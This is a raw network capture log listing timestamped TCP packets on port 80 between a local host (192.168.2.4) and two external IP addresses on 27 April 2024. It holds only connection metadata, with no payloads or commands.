Apr 27, 2024 00:46:05.804883957 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:05.804893970 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.804996014 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.805025101 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:05.805035114 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.805159092 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.805198908 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.805357933 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.805392981 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:05.805480957 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.805516005 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:05.805538893 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.805577040 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.805613041 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.805829048 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.805857897 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:05.805867910 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.805998087 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.806027889 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:05.806035995 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.806157112 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.806190014 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:05.806196928 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.806236029 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.806268930 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:05.806305885 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.806488037 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.806494951 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:05.806529045 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.806643963 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.806665897 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:05.806793928 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.806834936 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.806864023 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:05.806941986 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.809621096 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:05.819614887 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 00:46:05.819751978 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 00:46:05.825639009 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 00:46:05.948627949 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 00:46:05.995167017 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.995215893 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.995311022 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.995347977 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.995433092 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:05.995433092 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:05.995465994 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.995503902 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.995542049 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.995578051 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.995671034 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.995698929 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:05.995707989 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.997143984 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.997172117 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:05.997181892 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.997217894 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.997246027 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:05.997253895 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.997301102 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.997325897 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:05.997335911 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.997370958 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.997396946 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:05.997441053 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.997477055 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.997499943 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:05.997514963 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.997565985 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.997591019 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:05.997601032 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.997637033 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.997661114 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:05.997673988 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.997711897 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.997735023 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:05.997747898 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.997782946 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.997808933 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:05.997821093 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.997855902 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.997880936 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:05.997890949 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.997926950 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.997950077 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:05.997962952 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.997997999 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.998022079 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:05.998116970 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.998492956 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:05.998876095 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.998913050 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.998950005 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.998975039 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:05.998986959 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.999022961 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.999047041 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:05.999058008 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.999093056 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.999119997 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:05.999129057 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.999259949 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.999280930 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:05.999294996 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.999331951 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.999357939 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:05.999367952 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.999434948 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.999459982 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:05.999470949 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.999509096 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.999532938 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:05.999546051 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.999794960 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.999819994 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:05.999831915 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.999979019 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.000006914 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.000017881 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.000174999 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.000200987 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.000211000 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.000341892 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.000371933 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.000377893 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.000413895 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.000438929 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.000483036 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.000519037 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.000546932 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.000555038 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.000591040 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.000612974 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.000657082 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.000690937 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.000716925 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.000840902 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.000875950 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.000899076 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.000911951 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.001034021 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.001058102 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.001070976 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.001107931 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.001130104 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.001143932 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.001180887 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.001204967 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.001215935 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.001252890 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.001276970 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.001287937 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.001606941 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.001632929 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.001642942 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.001678944 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.001705885 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.001717091 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.001948118 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.001974106 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.001985073 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.002022028 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.002046108 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.002057076 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.002094030 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.002119064 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.002130032 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.002166033 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.002190113 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.002201080 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.002238035 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.002262115 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.002274036 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.002310038 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.002332926 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.002345085 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.002381086 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.002404928 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.002574921 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.002610922 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.002645969 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.002681971 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.002706051 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.002720118 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.003510952 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.003659964 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.003684998 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.003696918 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.003732920 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.003757000 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.004467010 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.004623890 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.004648924 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.004661083 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.004697084 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.004718065 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.004733086 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.004766941 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.004793882 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.004802942 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.004838943 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.004863024 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.004873991 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.004909039 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.004935026 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.004945993 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.004981041 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.005006075 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.005017042 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.005040884 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.005052090 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.005086899 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.005110979 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.005125999 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.005161047 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.005183935 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.005198002 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.005234957 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.005259037 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.005271912 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.005306005 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.005330086 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.005342007 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.005377054 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.005403042 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.005413055 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.005448103 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.005471945 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.005484104 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.005521059 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.005542994 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.005558014 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.005593061 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.005616903 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.005629063 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.005665064 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.005687952 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.005701065 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.005737066 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.005754948 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.005773067 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.005903959 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.005934954 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.005939960 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.005976915 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.006000996 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.006011963 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.006047010 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.006073952 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.006082058 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.006119013 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.006141901 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.006155014 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.006190062 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.006213903 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.006227970 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.006263018 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.006289005 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.006361961 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.006397963 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.006422997 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.006433010 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.006469011 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.006493092 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.006506920 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.006542921 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.006566048 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.006671906 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.006707907 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.006732941 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.006746054 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.008363008 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.008392096 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.008400917 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.008438110 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.008460999 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.008510113 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.010494947 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.030503035 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.119422913 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 00:46:06.190670967 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.190694094 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.190747976 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.190777063 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.190798998 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.190825939 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.190836906 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.190856934 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.190875053 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.190896988 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.190900087 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.190958977 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.190985918 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.191006899 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.191030979 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.191051006 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.191121101 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.191134930 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.191144943 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.191157103 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.191164017 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.191195965 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.191231012 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.191284895 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.192094088 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.192112923 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.192126989 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.192138910 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.192159891 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.192209959 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.192872047 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.192884922 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.192946911 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.192965031 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.193010092 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.193022013 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.193030119 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.193030119 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.193074942 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.193095922 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.193149090 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.193161011 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.193214893 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.193243027 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.193259954 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.193303108 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.193316936 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.193324089 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.193392038 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.193403959 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.193411112 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.193414927 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.193449974 CEST	49734	80	192.168.2.4	176.97.76.106
